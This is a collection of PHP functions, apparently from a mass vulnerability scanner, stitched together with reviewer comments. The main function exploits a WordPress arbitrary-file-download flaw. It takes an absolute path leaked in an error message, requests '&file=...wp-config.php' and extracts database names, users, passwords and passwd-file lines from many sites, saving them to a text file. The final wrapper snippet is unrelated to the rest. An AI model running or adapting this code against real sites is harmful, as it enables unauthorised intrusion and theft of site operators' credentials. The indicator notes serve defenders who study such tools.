/**
 * Reads a newline-separated list of URLs and runs __request() once per entry.
 *
 * Lines are split on "\n" only, entries that PHP treats as falsy are dropped,
 * and duplicates are collapsed before the loop starts. The number of entries
 * left is printed first. The return value of file_get_contents() is not
 * checked, so an unreadable list file is treated like an empty one.
 *
 * @param array $file Options array; 'file' is the path of the list to read,
 *                    'target' is overwritten with the current entry before
 *                    each __request() call.
 * @return void
 */
function __listTarget($file)
{
    $rawList  = file_get_contents($file['file']);
    $lines    = explode("\n", $rawList);
    $nonEmpty = array_filter($lines);
    $entries  = array_unique($nonEmpty);
    $total    = count($entries);

    echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . $total . "\n\n";

    foreach ($entries as $entry) {
        echo "\n[+] [INFO] SCANNING : {$entry} \n";
        __plus();
        $file['target'] = $entry;
        // Kept as a single concatenation: both calls run left to right and the
        // resulting string is discarded, exactly as in the original.
        __request($file) . __plus();
    }
}
Example #2
/**
 * Probes one host with each configured path in turn and reports the outcome.
 *
 * For every entry of $params['exploit_model'] (label => path) the function
 * calls __request() and stops at the first attempt whose http_code is not 0.
 * A final http_code of 200 is printed as a finding and appended to
 * $params['file_output']; anything else is printed as "[NOT VULN]".
 *
 * Review notes for anyone reading the tool's output:
 *  - A 200 status alone is reported as a finding; the response body is not
 *    checked here, so a generic 200 page produces the same report.
 *  - The report file receives whatever __getUserPass() returns (helper not
 *    shown; presumably credentials parsed from the body) in plain text.
 *  - $rest is only assigned inside the loop; with an empty
 *    $params['exploit_model'] it is undefined when read below.
 *
 * @param array  $params Options: 'exploit_model', 'file_output', 'line', plus
 *                       keys filled in here ('exploit', 'host').
 * @param string $target Host (or base URL) being checked.
 * @return void
 */
function __subProcess($params, $target)
{
    // The loop reassigns $params['exploit_model'] to the current key; a by-value
    // foreach keeps iterating over the array it started with.
    foreach ($params['exploit_model'] as $camp => $value) {
        $params['exploit'] = $value;
        $params['exploit_model'] = $camp;
        $params['host'] = $target;
        $rest = __request($params);
        __plus();
        // Stop after the first attempt with a non-zero http_code
        // (presumably curl_getinfo() data, where 0 means no HTTP response - confirm).
        if ($rest['dados_01']['http_code'] != 0) {
            break;
        }
    }
    __plus();
    // Running count of processed hosts, kept in the session.
    $_SESSION["cont_ip"]++;
    if ($rest['dados_01']['http_code'] == 200) {
        // Status 200: treated as "file found".
        // $_SESSION["cNN"] values are concatenated as output decoration
        // (presumably terminal colour codes - set elsewhere).
        // NOTE(review): in date(), "m" is the month number; minutes are "i",
        // so "h:m:s" prints hour:month:second.
        $style_var = "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c05"]}";
        echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
        $output_view = "{$style_var}  [ ! ]__[INFO][COD]: {$rest['dados_01']['http_code']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][IP/FILE]: {$params['host']}{$params['exploit']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][MODEL]: {$params['exploit_model']}\n";
        $output_view .= "{$style_var}  [ ! ]__[INFO][DETAILS_1]:  {$rest['dados_02']}\n{$_SESSION["c00"]}";
        // Extra detail derived from the responding IP address (helper not shown).
        $info_ip = __infoIP($rest['dados_01']['primary_ip']);
        $output_view .= "{$style_var}  [ ! ]__[INFO][DETAILS_2]:  {$info_ip}\n{$_SESSION["c00"]}";
        // __getUserPass() is called once for the console and once more for the file below.
        echo $output_view . __getUserPass($rest['corpo']) . $_SESSION["c00"];
        // Undecorated copy of the same report for the output file.
        $output = "COD: {$rest['dados_01']['http_code']} / IP-FILE: {$params['host']}{$params['exploit']}\nMODEL: {$params['exploit_model']}\nDETAILS_1: {$rest['dados_02']}\nDETAILS_2:{$info_ip}\n" . __getUserPass($rest['corpo']) . "{$params['line']}";
        // Appended without checking the return value; a failed write goes unnoticed.
        file_put_contents($params['file_output'], "{$output}\n{$params['line']}\n", FILE_APPEND);
        __plus();
    } else {
        // Any other status (including no response at all) is reported as not vulnerable.
        echo "{$_SESSION["c01"]}/ {$_SESSION["cont_ip"]}{$_SESSION["c00"]}\n";
        echo "{$_SESSION["c01"]}[ + ]__[{$_SESSION["c00"]}" . date("h:m:s") . "{$_SESSION["c13"]} [X]__[NOT VULN]: {$params['host']}\n{$_SESSION["c00"]}";
    }
    // Separator line after every host.
    echo $_SESSION["c07"] . $params['line'] . $_SESSION["c00"];
}
/**
 * Fetches $url . $plugin and checks the response for disclosed file contents.
 *
 * The response (headers included) is searched for WordPress database settings
 * (DB_NAME, DB_USER, ...) and for passwd-style account lines (root:, sbin:, ...).
 * A match is printed and appended to WORDPRESS_A_F_D.txt in the working
 * directory; otherwise a "[NOT VULN]" line is printed.
 *
 * Indicators visible in this code that a site operator can look for in logs:
 *  - the fixed User-Agent "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)";
 *  - a follow-up request carrying "&file=<absolute path>wp-config.php".
 * The follow-up is only sent when the first response contains an absolute
 * ".../wp-content/" path in bold markup (presumably an HTML-formatted PHP
 * error message), so such paths in responses are what enables the second step.
 *
 * Review notes:
 *  - The recursive branch returns before curl_close(), leaving that handle to
 *    be released by PHP, and nothing bounds the recursion depth.
 *  - Non-recursive paths return no value.
 *  - The return value of curl_exec() is not checked for failure.
 *
 * @param string $url    Base URL of the site.
 * @param string $plugin Path and query string appended to $url.
 * @return mixed Result of the recursive call when one is made, otherwise nothing.
 */
function __request($url, $plugin)
{
    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();
    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    // Response headers are included in the returned string, so every pattern
    // below is matched against headers as well as the body.
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    // Fixed, distinctive User-Agent sent with every request.
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1 (compatible; MSIE 5.01; Linux 5.0)");
    // CURLOPT_TIMEOUT covers the whole transfer, so the 10 s limit is reached
    // before the 20 s connect timeout can apply.
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 10);
    $corpo = curl_exec($objcurl);
    // The outer parentheses are the pattern delimiters. Looks for "<b>/.../wp-content/".
    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {
        // Retry with a "file" parameter built from the first matched path
        // ("wp-content/" removed, "wp-config.php" appended).
        return __request($url, "{$plugin}&file=" . str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();
    // NOTE(review): "#readfile(#i" has an unbalanced "(", so PCRE rejects the
    // pattern; that preg_match() returns false with a warning and never matches.
    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#root:#i", $corpo) || preg_match("#readfile(#i", $corpo)) {
        //-----------------------------------------------------------------------------
        // WordPress database settings: each pattern captures from the constant
        // name to the last single quote on the same line.
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
        // passwd-style lines for a handful of common account names.
        preg_match_all("(root:.*)", $corpo, $status['pwd1']);
        preg_match_all("(sbin:.*)", $corpo, $status['pwd2']);
        preg_match_all("(ftp:.*)", $corpo, $status['pwd3']);
        preg_match_all("(nobody:.*)", $corpo, $status['pwd4']);
        preg_match_all("(mail:.*)", $corpo, $status['pwd5']);
        //-----------------------------------------------------------------------------
        __plus();
        // NOTE(review): in date(), "m" is the month number; minutes are "i".
        $res = "\n------------------------------------------------------------------------------------------------------------------\n0x " . date("h:m:s") . " [INFO][VULN]::     [ " . date("d-m-Y H:i:s") . " ]\n";
        // The [0][0] reads assume every pattern matched; when only one kind of
        // content was found, the others are undefined offsets (a warning and an
        // empty string in the report).
        $res .= "0x " . date("h:m:s") . " [INFO][VULN][DB]:: " . $status['DB_NAME'][0][0];
        $res .= "::" . $status['DB_USER'][0][0];
        $res .= "::" . $status['DB_PASSWORD'][0][0];
        $res .= "::" . $status['DB_HOST'][0][0];
        $res .= "::" . $status['DB_CHARSET'][0][0];
        // The passwd section is added whenever "root" occurs anywhere in the response.
        $res .= preg_match("#root#i", $corpo) ? "\n0x " . date("h:m:s") . "[INFO][VULN][FILE_PASSWORD]::{$status['pwd1'][0][0]} - {$status['pwd2'][0][0]} - {$status['pwd3'][0][0]} - {$status['pwd4'][0][0]} - {$status['pwd5'][0][0]}" : NULL;
        $res .= "\n0x " . date("h:m:s") . " [INFO][VULN][URL]::{$url}{$plugin}";
        $res .= "\n------------------------------------------------------------------------------------------------------------------\n";
        print $res;
        // NOTE(review): all three search strings are empty as shown here (possibly
        // control characters lost when the listing was extracted), so as written
        // this leaves $res unchanged.
        $res = str_replace('', '', str_replace('', '', str_replace('', '', $res)));
        // Extracted values are appended in plain text; the write result is not checked.
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {
        print "\n0x " . date("h:m:s") . " [INFO][NOT VULN]:: {$url}{$plugin} \n";
    }
    curl_close($objcurl);
    __plus();
}
Example #4
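/**
 * Lazy-loading wrapper around __request().
 *
 * When __request() is not defined yet, jfunc('request') is called first
 * (helper not shown; presumably it loads the library that defines it), then
 * all three arguments are forwarded unchanged.
 *
 * $error now has a default value. With an optional $post in front of a
 * required $error, PHP 8 raises a deprecation notice and treats $post as
 * required anyway; giving $error a default keeps every existing three-argument
 * call working and makes the declared default of $post usable.
 *
 * @param mixed $action Forwarded to __request() as its first argument.
 * @param array $post   Forwarded to __request() as its second argument.
 * @param mixed $error  Passed by reference so __request() can report an error
 *                      back to the caller.
 * @return mixed Whatever __request() returns.
 */
function request($action, $post = array(), &$error = null)
{
    if (!function_exists('__request')) {
        jfunc('request');
    }

    return __request($action, $post, $error);
}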